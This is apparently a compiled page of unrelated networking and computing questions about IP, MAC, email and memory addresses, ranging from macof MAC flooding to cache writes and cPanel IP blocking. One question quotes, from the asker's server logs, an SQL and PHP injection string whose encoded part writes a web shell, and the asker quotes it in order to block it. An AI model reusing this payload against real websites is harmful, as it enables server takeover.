When MAC flooding, why would an attacker specify IP addresses and/or TCP ports?

I’m specifically referring to the macof tool (part of the dsniff package).

As I understand it, MAC flooding is meant to overload a switch’s CAM table, which maps MAC addresses to switch ports.

Where does specifying IP addresses and/or TCP ports fit into this?

Does doing so allow an attacker to bypass a Layer 3 switch’s filters, ones that filter traffic based on IP addresses and/or TCP ports?

What exactly is my router querying on these addresses?

I’m trying to understand how my router works, so I’m analyzing a couple of outputs (I logged in through SSH). I get these lines when trying netstat -a -e, and I’m not sure where these addresses come from, or what exactly they are doing.

The xxx.xxx.xxx.xxx is the IP address that my router gets from the ISP router (WAN).

tcp  0 0 xxx.xxx.xxx.xxx:50689 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:50695 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:35877 a104-75-170-56.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:35883 a104-75-170-56.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:35876 a104-75-170-56.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:50688 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED    tcp  0 0 xxx.xxx.xxx.xxx:50696 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  tcp  0 0 xxx.xxx.xxx.xxx:50697 a104-75-170-17.deploy.static.akamaitechnologies.com:www ESTABLISHED  

Email sent to 2 addresses sharing the same organization domain @123abc.com and one bounced back. Was it successfully delivered to the other address?

It is my first time asking questions, so my apologies if there are any mistakes. I sent an email to 2 addresses (2 different departments in the same organization with shared @123abc.com), and one bounced back from mailer-daemon@googlemail.com due to ‘address not found’. I later found out it was a generated email address. Could someone please tell me if my email was successfully delivered to the other ‘good’ address (the other department)? Thank you very much for your great help in advance.

Is it normal to see two different IP addresses in the arp table when you run the arp -a check?

Long story short, I noticed that there are two different IP addresses in the ARP table when I ran the arp check. I suspect my computer might have been compromised, because when I ran a similar check on my other computer it only returned one IP address instead of two. I’m not running any VPN or anything, if that would clear up any misunderstanding, which is why I’m puzzled by this.

Why don’t certain sites send newsletters to “anonymous” mail addresses?

I use an “anonymous” mail address (cock.li provider in my case). I have found that mainstream news sites in particular don’t send their newsletters to such addresses. It looks like the domains are blacklisted.

What is the reason? I can understand that they don’t want you writing comments from anonymous mail addresses, but passive reading of a newsletter is also prohibited?

Why this behavior? Why this behavior only with traditional mainstream news?

These newsletters usually have a lot of advertising and tracking, so why don’t they wish to deliver them to “anonymous” addresses?

How does a cache handle overwriting between 2 addresses in the same block?

Consider a byte-addressable cache with block size 16 bytes, where bytes 0-15 form one block. First I write an int (let’s say 7) to address 0, so now bytes 0-3 contain the int 7. Now if I try to write another int (9) to address 2, then how does the cache handle this? Also, if I try to read from byte 1, what effect does that have?

The lectures I’m watching suggest treating a block as the atomic unit in a cache, because keeping track of all the unwritten and written bytes will be a resource-heavy task. So how will the above situation pan out? Will every block contain only 1 instance of data, with every write beginning from byte 0? Because that is the only possible solution I can think of.

Publicly Available PCAP dumps that associate IP addresses with Operating System?

I am currently working on a machine learning module to detect Operating Systems based on existing packet traffic in pcap file format. So far, I have generated some traffic of popular Operating Systems available. However, this process is very tedious.

I would like to know if there are any publicly available pcap files that associate data generated from a particular Operating System (e.g. a pcap file that has a lot of traffic from Windows XP). I am aware that there are other similar questions asked regarding publicly available pcap files, however none of them seem to be focused on Operating Systems.

Thank you.

cPanel deny IP Addresses of spammers

I have a Drupal 7 site, but this question is a more generic one. In the logs I’m seeing regular “attacks” to access protected resources. So attackers are just trying. I’m starting to see more sophisticated attacks such as:


and with a referrer:

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} 

When I check the IP addresses of these attacks, 98% of them are already registered as spam in the stopforumspam database.

Is there a way to have a list or an API at cPanel level, so as not to have to deny each IP address manually?

My question is about cPanel, not Drupal, since I believe it is better to block them at a higher level, even before reaching Drupal.

In Drupal I have a stopforumspam module, but this is used to deny registration, which does not prevent attacks such as the one above.

What I need is to be able to block these attacks from known spammer IPs without having to add each IP address manually to the deny IP address list in cPanel.

Many thanks

Does anyone know the answer to the following questions on converting logical – physical addresses?

Due to the unforeseen pandemic, I am unable to speak to my tutor about the following question. I have emailed him, but I have not had an answer for weeks. Can someone please enlighten me?

Image and question to be answered below. Please provide an explanation, as I am struggling to find an answer:


Why two IP WAN addresses? [closed]

I have a ZTE 4G LTE + modem equipped with a specific phone card, and when I connect to the internet and obtain my IP address, I find 2 different ones: one belonging to the telephone provider, the other identified as the host. What is the cause of the presence of an additional IP on a NATed network?